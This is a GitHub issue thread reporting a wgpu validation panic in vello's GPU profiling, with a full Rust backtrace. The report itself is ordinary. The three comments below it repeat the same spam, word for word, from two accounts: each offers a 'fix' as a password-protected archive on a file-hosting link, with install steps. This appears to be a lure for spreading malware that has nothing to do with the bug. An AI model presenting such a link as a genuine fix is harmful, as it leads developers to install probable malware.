### ISSUE TITLE
gpu profiling validation error after debug layers changes

### ISSUE THREAD

**Issue by waywardmonkeys** [linebender/vello#678]
Pressing "g" in `with_winit` results in:

```
thread 'main' panicked at /Users/bruce/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:3411:5:
wgpu error: Validation Error

Caused by:
  In CommandEncoder::resolve_query_set
    Error encountered while trying to resolve a query
      Resolve buffer offset has to be aligned to `QUERY_RESOLVE_BUFFER_ALIGNMENT
```

This started with commit 74b61558ad55449589d4a792cf7143b2b71e4bfd

The backtrace is:

```
[2024-08-31T07:26:49.118Z ERROR wgpu::backend::wgpu_core] Handling wgpu errors as fatal by default
thread 'main' panicked at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:3411:5:
wgpu error: Validation Error

Caused by:
  In CommandEncoder::resolve_query_set
    Error encountered while trying to resolve a query
      Resolve buffer offset has to be aligned to `QUERY_RESOLVE_BUFFER_ALIGNMENT


stack backtrace:
   0: rust_begin_unwind
             at /rustc/3f5fd8dd41153bc5fdca9427e9e05be2c767ba23/library/std/src/panicking.rs:652:5
   1: core::panicking::panic_fmt
             at /rustc/3f5fd8dd41153bc5fdca9427e9e05be2c767ba23/library/core/src/panicking.rs:72:14
   2: wgpu::backend::wgpu_core::default_error_handler
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:3411:5
   3: core::ops::function::Fn::call
             at /rustc/3f5fd8dd41153bc5fdca9427e9e05be2c767ba23/library/core/src/ops/function.rs:79:5
   4: <alloc::boxed::Box<F,A> as core::ops::function::Fn<Args>>::call
             at /rustc/3f5fd8dd41153bc5fdca9427e9e05be2c767ba23/library/alloc/src/boxed.rs:2077:9
   5: wgpu::backend::wgpu_core::ErrorSinkRaw::handle_error
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:3397:17
   6: wgpu::backend::wgpu_core::ContextWgpuCore::handle_error
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:296:9
   7: wgpu::backend::wgpu_core::ContextWgpuCore::handle_error_nolabel
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:308:9
   8: <wgpu::backend::wgpu_core::ContextWgpuCore as wgpu::context::Context>::command_encoder_resolve_query_set
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/backend/wgpu_core.rs:2144:13
   9: <T as wgpu::context::DynContext>::command_encoder_resolve_query_set
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/context.rs:2920:9
  10: wgpu::CommandEncoder::resolve_query_set
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.1.0/src/lib.rs:4215:9
  11: wgpu_profiler::profiler::GpuProfiler::resolve_queries
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-profiler-0.18.0/src/profiler.rs:358:13
  12: vello::wgpu_engine::WgpuEngine::run_recording
             at ./vello/src/wgpu_engine.rs:720:9
  13: vello::Renderer::render_to_surface
             at ./vello/src/lib.rs:463:9
  14: <with_winit::VelloApp as winit::application::ApplicationHandler<with_winit::UserEvent>>::window_event
             at ./examples/with_winit/src/lib.rs:566:21
  15: winit::event_loop::dispatch_event_for_app
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/event_loop.rs:631:52
  16: winit::event_loop::EventLoop<T>::run_app::{{closure}}
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/event_loop.rs:265:49
  17: winit::platform_impl::platform::event_loop::map_user_event::{{closure}}
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/event_loop.rs:163:22
  18: <alloc::boxed::Box<F,A> as core::ops::function::FnMut<Args>>::call_mut
             at /rustc/3f5fd8dd41153bc5fdca9427e9e05be2c767ba23/library/alloc/src/boxed.rs:2070:9
  19: winit::platform_impl::platform::event_handler::EventHandler::handle_event
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/event_handler.rs:125:17
  20: winit::platform_impl::platform::app_state::ApplicationDelegate::handle_event
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/app_state.rs:303:9
  21: winit::platform_impl::platform::app_state::ApplicationDelegate::cleared
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/app_state.rs:365:13
  22: winit::platform_impl::platform::observer::control_flow_end_handler::{{closure}}
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/observer.rs:84:21
  23: winit::platform_impl::platform::observer::control_flow_handler::{{closure}}
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/observer.rs:46:9
  24: std::panicking::try::do_call
             at /rustc/3f5fd8dd41153bc5fdca9427e9e05be2c767ba23/library/std/src/panicking.rs:559:40
  25: ___rust_try
  26: std::panicking::try
             at /rustc/3f5fd8dd41153bc5fdca9427e9e05be2c767ba23/library/std/src/panicking.rs:523:19
  27: std::panic::catch_unwind
             at /rustc/3f5fd8dd41153bc5fdca9427e9e05be2c767ba23/library/std/src/panic.rs:149:14
  28: winit::platform_impl::platform::event_loop::stop_app_on_panic
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/event_loop.rs:424:11
  29: winit::platform_impl::platform::observer::control_flow_handler
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/observer.rs:44:5
  30: winit::platform_impl::platform::observer::control_flow_end_handler
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/observer.rs:79:9
  31: <unknown>
  32: <unknown>
  33: <unknown>
  34: <unknown>
  35: <unknown>
  36: <unknown>
  37: <unknown>
  38: <unknown>
  39: <unknown>
  40: <unknown>
  41: <() as objc2::encode::EncodeArguments>::__invoke
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/objc2-0.5.2/src/encode.rs:437:26
  42: objc2::runtime::message_receiver::msg_send_primitive::send
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/objc2-0.5.2/src/runtime/message_receiver.rs:173:18
  43: objc2::runtime::message_receiver::MessageReceiver::send_message
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/objc2-0.5.2/src/runtime/message_receiver.rs:433:38
  44: objc2::__macro_helpers::msg_send::MsgSend::send_message
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/objc2-0.5.2/src/__macro_helpers/msg_send.rs:27:31
  45: objc2_app_kit::generated::__NSApplication::NSApplication::run
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/objc2-0.5.2/src/macros/extern_methods.rs:247:14
  46: winit::platform_impl::platform::event_loop::EventLoop<T>::run_on_demand::{{closure}}::{{closure}}
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/event_loop.rs:295:26
  47: objc2::rc::autorelease::autoreleasepool
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/objc2-0.5.2/src/rc/autorelease.rs:438:15
  48: winit::platform_impl::platform::event_loop::EventLoop<T>::run_on_demand::{{closure}}
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/event_loop.rs:281:13
  49: winit::platform_impl::platform::event_handler::EventHandler::set
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/event_handler.rs:98:9
  50: winit::platform_impl::platform::app_state::ApplicationDelegate::set_event_handler
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/app_state.rs:172:9
  51: winit::platform_impl::platform::event_loop::EventLoop<T>::run_on_demand
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/event_loop.rs:280:9
  52: winit::platform_impl::platform::event_loop::EventLoop<T>::run
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/platform_impl/macos/event_loop.rs:267:9
  53: winit::event_loop::EventLoop<T>::run_app
             at .../.cargo/registry/src/index.crates.io-6f17d22bba15001f/winit-0.30.3/src/event_loop.rs:265:9
  54: with_winit::run
             at ./examples/with_winit/src/lib.rs:750:5
  55: with_winit::main
             at ./examples/with_winit/src/lib.rs:831:13
  56: with_winit_bin::main
             at ./examples/with_winit/src/main.rs:9:9
  57: core::ops::function::FnOnce::call_once
             at /rustc/3f5fd8dd41153bc5fdca9427e9e05be2c767ba23/library/core/src/ops/function.rs:250:5
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
